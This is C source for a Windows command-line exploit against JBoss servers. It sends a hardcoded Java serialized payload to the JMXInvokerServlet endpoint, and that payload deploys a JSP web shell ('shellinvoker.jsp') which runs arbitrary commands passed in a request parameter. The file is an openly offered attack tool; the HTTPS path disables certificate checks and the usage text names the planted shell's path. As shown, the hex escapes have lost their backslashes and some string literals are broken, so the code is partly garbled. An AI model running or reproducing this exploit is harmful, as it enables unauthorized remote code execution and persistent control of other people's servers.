Jboss remote getshell (JMXInvokerServlet) vc版

#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
#include <winhttp.h>
#include <comdef.h>
#pragma comment (lib,"Winhttp.lib")

char shell_invoke[] = ( 
    "xacxedx00x05x73x72x00x29x6fx72x67x2ex6ax62x6fx73" ///shellinvoker/shellinvoker.jsp
    "x73x2ex69x6ex76x6fx63x61x74x69x6fx6ex2ex4dx61x72"
    "x73x68x61x6cx6cx65x64x49x6ex76x6fx63x61x74x69x6f"
    "x6exf6x06x95x27x41x3exa4xbex0cx00x00x78x70x70x77"
    "x08x78x94x98x47xc1xd0x53x87x73x72x00x11x6ax61x76"
    "x61x2ex6cx61x6ex67x2ex49x6ex74x65x67x65x72x12xe2"
    "xa0xa4xf7x81x87x38x02x00x01x49x00x05x76x61x6cx75"
    "x65x78x72x00x10x6ax61x76x61x2ex6cx61x6ex67x2ex4e"
    "x75x6dx62x65x72x86xacx95x1dx0bx94xe0x8bx02x00x00"
    "x78x70xe3x2cx60xe6x73x72x00x24x6fx72x67x2ex6ax62"
    "x6fx73x73x2ex69x6ex76x6fx63x61x74x69x6fx6ex2ex4d"
    "x61x72x73x68x61x6cx6cx65x64x56x61x6cx75x65xeaxcc"
    "xe0xd1xf4x4axd0x99x0cx00x00x78x70x7ax00x00x02xc6"
    "x00x00x02xbexacxedx00x05x75x72x00x13x5bx4cx6ax61"
    "x76x61x2ex6cx61x6ex67x2ex4fx62x6ax65x63x74x3bx90"
    "xcex58x9fx10x73x29x6cx02x00x00x78x70x00x00x00x04"
    "x73x72x00x1bx6ax61x76x61x78x2ex6dx61x6ex61x67x65"
    "x6dx65x6ex74x2ex4fx62x6ax65x63x74x4ex61x6dx65x0f"
    "x03xa7x1bxebx6dx15xcfx03x00x00x78x70x74x00x2cx6a"
    "x62x6fx73x73x2ex61x64x6dx69x6ex3ax73x65x72x76x69"
    "x63x65x3dx44x65x70x6cx6fx79x6dx65x6ex74x46x69x6c"
    "x65x52x65x70x6fx73x69x74x6fx72x79x78x74x00x05x73"
    "x74x6fx72x65x75x71x00x7ex00x00x00x00x00x05x74x00"
    "x10x73x68x65x6cx6cx69x6ex76x6fx6bx65x72x2ex77x61"
    "x72x74x00x0cx73x68x65x6cx6cx69x6ex76x6fx6bx65x72"
    "x74x00x04x2ex6ax73x70x74x01x79x3cx25x40x20x70x61"
    "x67x65x20x69x6dx70x6fx72x74x3dx22x6ax61x76x61x2e"
    "x75x74x69x6cx2ex2ax2cx6ax61x76x61x2ex69x6fx2ex2a"
    "x22x25x3ex3cx70x72x65x3ex3cx25x69x66x28x72x65x71"
    "x75x65x73x74x2ex67x65x74x50x61x72x61x6dx65x74x65"
    "x72x28x22x70x70x70x22x29x20x21x3dx20x6ex75x6cx6c"
    "x20x26x26x20x72x65x71x75x65x73x74x2ex67x65x74x48"
    "x65x61x64x65x72x28x22x75x73x65x72x2dx61x67x65x6e"
    "x74x22x29x2ex65x71x75x61x6cx73x28x22x6ax65x78x62"
    "x6fx73x73x22x29x20x29x20x7bx20x50x72x6fx63x65x73"
    "x73x20x70x20x3dx20x52x75x6ex74x69x6dx65x2ex67x65"
    "x74x52x75x6ex74x69x6dx65x28x29x2ex65x78x65x63x28"
    "x72x65x71x75x65x73x74x2ex67x65x74x50x61x72x61x6d"
    "x65x74x65x72x28x22x70x70x70x22x29x29x3bx20x44x61"
    "x74x61x49x6ex70x75x74x53x74x72x65x61x6dx20x64x69"
    "x73x20x3dx20x6ex65x77x20x44x61x74x61x49x6ex70x75"
    "x74x53x74x72x65x61x6dx28x70x2ex67x65x74x49x6ex70"
    "x75x74x53x74x72x65x61x6dx28x29x29x3bx20x53x74x72"
    "x69x6ex67x20x64x69x73x72x20x3dx20x64x69x73x2ex72"
    "x65x61x64x4cx69x6ex65x28x29x3bx20x77x68x69x6cx65"
    "x20x28x20x64x69x73x72x20x21x3dx20x6ex75x6cx6cx20"
    "x29x20x7bx20x6fx75x74x2ex70x72x69x6ex74x6cx6ex28"
    "x64x69x73x72x29x3bx20x64x69x73x72x20x3dx20x64x69"
    "x73x2ex72x65x61x64x4cx69x6ex65x28x29x3bx20x7dx20"
    "x7dx25x3ex73x72x00x11x6ax61x76x61x2ex6cx61x6ex67"
    "x2ex42x6fx6fx6cx65x61x6excdx20x72x80xd5x9cxfaxee"
    "x02x00x01x5ax00x05x76x61x6cx75x65x78x70x01x75x72"
    "x00x13x5bx4cx6ax61x76x61x2ex6cx61x6ex67x2ex53x74"
    "x72x69x6ex67x3bxadxd2x56xe7xe9x1dx7bx47x02x00x00"
    "x78x70x00x00x00x05x74x00x10x6ax61x76x61x2ex6cx61"
    "x6ex67x2ex53x74x72x69x6ex67x71x00x7ex00x0fx71x00"
    "x7ex00x0fx71x00x7ex00x0fx74x00x07x62x6fx6fx6cx65"
    "x61x6ex63x79xb8x87x78x77x08x00x00x00x00x00x00x00"
    "x01x73x72x00x22x6fx72x67x2ex6ax62x6fx73x73x2ex69"
    "x6ex76x6fx63x61x74x69x6fx6ex2ex49x6ex76x6fx63x61"
    "x74x69x6fx6ex4bx65x79xb8xfbx72x84xd7x93x85xf9x02"
    "x00x01x49x00x07x6fx72x64x69x6ex61x6cx78x70x00x00"
    "x00x04x70x78");

void request_https(wchar_t* Host,int port)
{
    DWORD dwSize = 0;
    DWORD dwDownloaded = 0;
    LPSTR pszOutBuffer;
    BOOL bResults = FALSE;
    HINTERNET hSession = NULL,
        hConnect = NULL,
        hRequest = NULL;

    // Use WinHttpOpen to obtain a session handle.
    hSession = WinHttpOpen( L"WinHTTP Example/1.0",
        WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
        WINHTTP_NO_PROXY_NAME,
        WINHTTP_NO_PROXY_BYPASS, 0);

    // Specify an HTTP server.
    if (hSession)
        hConnect = WinHttpConnect( hSession,Host,
        port, 0);

    // Create an HTTP request handle.
    if (hConnect)
        hRequest = WinHttpOpenRequest( hConnect, L"POST",L"/invoker/JMXInvokerServlet",
        NULL, WINHTTP_NO_REFERER,
        WINHTTP_DEFAULT_ACCEPT_TYPES,
        WINHTTP_FLAG_SECURE);

    DWORD options = SECURITY_FLAG_IGNORE_CERT_CN_INVALID |
        SECURITY_FLAG_IGNORE_CERT_DATE_INVALID |
        SECURITY_FLAG_IGNORE_UNKNOWN_CA ;

    if( hRequest )
        bResults = WinHttpAddRequestHeaders( hRequest,
        L"Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue"
        ,(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );

    bResults = WinHttpAddRequestHeaders( hRequest, 
        L"Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );

    bResults = WinHttpSetOption( hRequest, WINHTTP_OPTION_SECURITY_FLAGS ,
        (LPVOID)&options, sizeof (DWORD) );

    if(bResults == FALSE){
        printf("Error in WinHttpQueryOption WINHTTP_OPTION_SECURITY_FLAGS: %ld
",GetLastError());
    }

    // Send a request.
    if (hRequest){
        bResults = WinHttpSendRequest( hRequest,
            WINHTTP_NO_ADDITIONAL_HEADERS, 0,
            shell_invoke, WORD(sizeof(shell_invoke)),
            sizeof(shell_invoke), 0);
        if(bResults == FALSE)
            printf ("WinHttpSendRequest error: %ld
",GetLastError());
    }

    if( hRequest ) WinHttpCloseHandle( hRequest );
    if( hConnect ) WinHttpCloseHandle( hConnect );
    if( hSession ) WinHttpCloseHandle( hSession );
}


void request_http(wchar_t* Host, int Port)
{
    DWORD dwSize = sizeof(DWORD);
    DWORD dwStatusCode = 0;
    BOOL  bResults = FALSE;
    HINTERNET hSession = NULL,
    hConnect = NULL,
    hRequest = NULL;

    // Use WinHttpOpen to obtain a session handle.
    hSession = WinHttpOpen(L"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36", 
        WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
        WINHTTP_NO_PROXY_NAME, 
        WINHTTP_NO_PROXY_BYPASS,
        0 );

    // Specify an HTTP server.
    if( hSession )
        hConnect = WinHttpConnect( hSession,
        Host,
        Port,
        0 );

    // Create an HTTP Request handle.
    if( hConnect )
        hRequest = WinHttpOpenRequest( hConnect,
        L"POST",L"/invoker/JMXInvokerServlet",  // /invoker/JMXInvokerServlet
        NULL,
        WINHTTP_NO_REFERER, 
        WINHTTP_DEFAULT_ACCEPT_TYPES,
        0 );
    // Add a request header.
    if( hRequest )
        bResults = WinHttpAddRequestHeaders( hRequest,
        L"Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue"
        ,(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );

        bResults = WinHttpAddRequestHeaders( hRequest, 
            L"Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );
    // Send a Request.
    if( bResults ) 
        bResults = WinHttpSendRequest( hRequest, 
        WINHTTP_NO_ADDITIONAL_HEADERS,
        0,
        shell_invoke,WORD(sizeof(shell_invoke)),
        sizeof(shell_invoke),
        0 );

    // Report any errors.
    if( !bResults )
        printf( "Error %d has occurred.
", GetLastError( ) );

    // Close open handles.
    if( hRequest ) WinHttpCloseHandle( hRequest );
    if( hConnect ) WinHttpCloseHandle( hConnect );
    if( hSession ) WinHttpCloseHandle( hSession );
    //return 0;
}

int main(int argc, char* argv[])
{

    if (argc < 4)
    {
        printf("[*]:%s Jboss Exploit remote getshell
",argv[0]);
        printf("[*]:%s Remote_Host Remote_ip http/https 
",argv[0]);
        printf("[*]:Getshell Path:/shellinvoker/shellinvoker.jsp
");
        return -1;
    }
    wchar_t Host[MAX_PATH] = {0};
    wchar_t procotol[MAX_PATH] = {0};
    wsprintfW(Host, L"%S", argv[1]);
    wsprintfW(procotol,L"%S",argv[3]);
    printf("
[*]:Host:%S procotol:%S 
", Host,procotol);

    if (0 == lstrcmpi(procotol, L"http"))
    {
        request_http(Host,atoi(argv[2]));

    }else if(0 == lstrcmpi(procotol, L"https"))
    {
        request_https(Host,atoi(argv[2]));
    }else
    {
        printf("
Unknown option.
");
        return 0;
    }
    return 0;
}